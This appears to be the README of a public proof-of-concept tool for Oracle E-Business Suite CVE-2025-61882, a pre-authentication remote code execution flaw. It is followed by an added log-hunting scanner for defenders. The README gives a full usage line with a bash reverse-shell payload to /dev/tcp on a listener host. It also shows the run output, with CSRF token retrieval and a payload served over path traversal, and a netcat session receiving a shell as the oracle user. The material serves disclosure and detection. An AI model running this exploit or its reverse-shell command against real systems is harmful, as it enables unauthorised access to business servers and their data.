Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882
See our blog post for technical details.
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
(*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator
- Sonny, Sina Kheirkhah (@SinSinology), Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-61882]
[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -
Listener
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
This script attempts to detect whether Oracle E-Business Suite is vulnerable to CVE-2025-61882.
Oracle E-Business Suite, versions 12.2.3-12.2.14
For more information, visit the Oracle Security Alert Advisory - CVE-2025-61882.
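For defenders, the request visible in the sample run (`GET /OA_HTML/help/../ieshostedsurvey.xsl`) can be hunted for in web or egress proxy logs. The scanner below is an added example, not part of the watchTowr script; it assumes logs in the Common Log Format style shown in the sample run, and its function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request portion of a Common Log Format style line, as in the sample run.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}|-)'
)
XSL_NAME = "ieshostedsurvey.xsl"   # file name seen in the sample run
HELP_PREFIX = "/oa_html/help/"     # path prefix seen in the sample run

def decode_path(target, rounds=3):
    """Drop the query string and undo up to `rounds` layers of percent-encoding."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def classify(line):
    """Return (src, timestamp, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m["target"])
    reasons = []
    if path.rsplit("/", 1)[-1] == XSL_NAME:
        reasons.append("xsl-fetch")
    if path.startswith(HELP_PREFIX) and "/../" in path:
        reasons.append("help-traversal")
    return (m["src"], m["ts"], reasons) if reasons else None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines; only the first request is taken from the page.
SAMPLE = [
    '192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -',
    '192.168.1.22 - - [06/Oct/2025 20:50:03] "GET /OA_HTML/help/%2e%2e/ieshostedsurvey.xsl HTTP/1.1" 200 -',
    '192.168.1.40 - - [06/Oct/2025 20:51:10] "GET /OA_HTML/help/index.html HTTP/1.1" 200 -',
    '192.168.1.40 - - [06/Oct/2025 20:51:12] "GET /favicon.ico HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    for src, ts, reasons in scan(SAMPLE):
        print(f"{ts} {src} {','.join(reasons)}")
```

A hit whose source address is an E-Business Suite application server means that server itself requested the stylesheet from another host, which is the behaviour the sample run shows.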